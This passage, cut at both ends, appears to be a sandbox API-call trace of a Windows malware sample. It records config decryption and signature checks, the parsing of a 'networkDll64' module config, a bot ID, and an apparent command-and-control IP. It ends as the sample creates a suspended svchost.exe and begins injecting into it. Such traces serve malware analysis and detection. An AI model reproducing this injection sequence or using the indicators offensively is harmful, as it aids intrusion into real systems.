phProv=0xce140*=0x338236d0) returned 1 [0189.740] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.740] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0189.741] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf2a0 [0189.741] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.741] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0189.741] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338231d0) returned 1 [0189.741] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.741] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0189.741] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf420 [0189.742] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.742] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0189.742] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.742] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.742] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0189.742] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf030 [0189.742] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.742] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.742] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.743] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.743] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0189.743] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf270 [0189.743] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.743] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.743] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.744] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.744] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0189.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf2d0 [0189.744] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.744] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.744] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.747] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.747] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf450 [0189.747] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.747] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.747] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.748] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.748] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0189.748] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf870 [0189.748] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.748] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.748] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.749] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.749] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0189.749] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf090 [0189.749] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.749] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.749] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.750] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.750] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0189.750] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf0f0 [0189.750] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.750] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.750] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.751] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.751] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0189.751] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf8d0 [0189.751] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.751] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.751] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.751] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.752] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0189.752] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf180 [0189.752] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.752] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.752] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.752] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.752] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0189.752] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf6f0 [0189.752] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.753] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.753] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822bd0) returned 1 [0189.753] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.753] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0189.753] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.753] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0189.753] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.754] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.754] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0189.754] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.754] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.754] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338230d0) returned 1 [0189.755] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.755] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0189.755] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.755] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0189.755] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.755] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.755] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0189.755] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.755] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.755] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.756] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.756] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0189.756] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.756] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.756] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.756] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.756] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0189.757] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.757] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.757] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.757] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.757] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0189.757] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0189.757] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.757] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.758] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.758] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0189.758] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0189.758] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.758] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338232d0) returned 1 [0189.758] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.758] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0189.758] CryptDestroyHash (hHash=0x3396f660) returned 1 [0189.758] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0189.759] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338227d0) returned 1 [0189.759] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.759] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0189.759] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.759] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0189.759] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.760] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.760] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0189.760] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.760] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.760] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822bd0) returned 1 [0189.760] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.760] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0189.760] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0189.760] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0189.760] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338226d0) returned 1 [0189.763] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.763] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0189.763] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.763] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0189.763] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.764] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.764] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0189.764] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.764] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.764] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.765] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.765] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0189.765] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.765] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.765] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.765] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.765] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0189.765] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.765] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.768] CryptSetKeyParam (hKey=0x3396ec50, dwParam=0x4, pbData=0xce184*=0x1, dwFlags=0x0) returned 1 [0189.768] CryptSetKeyParam (hKey=0x3396ec50, dwParam=0x1, pbData=0x32acf4e0, dwFlags=0x0) returned 1 [0189.768] CryptDecrypt (in: hKey=0x3396ec50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ad4ae0, pdwDataLen=0xce16c | out: pbData=0x32ad4ae0, pdwDataLen=0xce16c) returned 1 [0189.768] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0189.768] CryptDestroyKey (hKey=0x3396ec50) returned 0 [0189.768] GetVersion () returned 0x295a000a [0189.768] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce0d8, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xce0d8) returned 0x0 [0189.769] BCryptImportKeyPair (in: hAlgorithm=0x3327d870, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xce0d0, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xce0d0) returned 0x0 [0189.769] BCryptGetProperty (in: hObject=0x337b13a0, pszProperty="SignatureLength", pbOutput=0xce0cc, cbOutput=0x4, pcbResult=0xce0ec, dwFlags=0x0 | out: pbOutput=0xce0cc, pcbResult=0xce0ec) returned 0x0 [0189.769] BCryptVerifySignature (hKey=0x337b13a0, pPaddingInfo=0x0, pbHash=0x32e64c30, cbHash=0x30, pbSignature=0x32adbd8a, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0189.770] BCryptDestroyKey (in: hKey=0x337b13a0 | out: hKey=0x337b13a0) returned 0x0 [0189.770] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x3327d870, dwFlags=0x0 | out: hAlgorithm=0x3327d870) returned 0x0 [0189.770] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0189.770] lstrlenA (lpString="*") returned 30 [0189.770] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc [0189.770] CharLowerBuffA (in: lpsz="nohead", cchLength=0x6 | out: lpsz="nohead") returned 0x6 [0189.770] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8 [0189.770] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0189.770] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8 [0189.770] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0189.770] CharLowerBuffA (in: lpsz="autoconf", cchLength=0x8 | out: lpsz="autoconf") returned 0x8 [0189.770] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4 [0189.770] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3 [0189.770] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4 [0189.771] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6 [0189.771] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2 [0189.771] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2 [0189.771] GetFullPathNameW (in: lpFileName="EN\\networkDll64", nBufferLength=0x105, lpBuffer=0x32e806f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\networkDll64", lpFilePart=0x0) returned 0x23 [0189.771] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ac5770 | out: hHeap=0x2150000) returned 1 [0189.771] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e806f0 | out: hHeap=0x2150000) returned 1 [0189.771] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0189.771] WinHttpCloseHandle (hInternet=0x3396bcd0) returned 1 [0189.771] WinHttpCloseHandle (hInternet=0x338c9ff0) returned 1 [0189.771] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79530 | out: hHeap=0x2150000) returned 1 [0189.771] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79aa0 | out: hHeap=0x2150000) returned 1 [0189.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="networkDll64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0189.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="networkDll64", cchWideChar=-1, lpMultiByteStr=0x32e80c50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="networkDll64", lpUsedDefaultChar=0x0) returned 13 [0189.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot153", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0189.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot153", cchWideChar=-1, lpMultiByteStr=0x32e80df0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tot153", lpUsedDefaultChar=0x0) returned 7 [0189.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0189.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", cchWideChar=-1, lpMultiByteStr=0x3204eae0, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", lpUsedDefaultChar=0x0) returned 50 [0189.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce308 | out: lpSystemTimeAsFileTime=0xce308*(dwLowDateTime=0xfda073bb, dwHighDateTime=0x1d7b3c9)) [0189.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.153.199.169", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0189.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.153.199.169", cchWideChar=-1, lpMultiByteStr=0x32e81190, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="88.153.199.169", lpUsedDefaultChar=0x0) returned 15 [0189.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80df0 | out: hHeap=0x2150000) returned 1 [0189.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204eae0 | out: hHeap=0x2150000) returned 1 [0189.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e81190 | out: hHeap=0x2150000) returned 1 [0189.772] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.772] GetStartupInfoW (in: lpStartupInfo=0xcde78 | out: lpStartupInfo=0xcde78*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0189.772] GetSystemDirectoryW (in: lpBuffer=0x31d51720, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0189.772] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcde78*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0xcdee0 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0xcdee0*(hProcess=0x730, hThread=0x80c, dwProcessId=0x2f8, dwThreadId=0x1384)) returned 1 [0189.785] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x31d51720 | out: hHeap=0x2150000) returned 1 [0189.805] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x640 [0189.805] GetCurrentProcess () returned 0xffffffffffffffff [0189.805] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x72c [0189.805] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x744 [0189.805] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x640, hTargetProcessHandle=0x730, lpTargetHandle=0xcdc60, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdc60*=0x4) returned 1 [0189.806] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x744, hTargetProcessHandle=0x730, lpTargetHandle=0xcdc68, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdc68*=0x8) returned 1 [0189.806] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x72c, hTargetProcessHandle=0x730, lpTargetHandle=0xcdc70, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdc70*=0xc) returned 1 [0189.806] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x230, flAllocationType=0x3000, 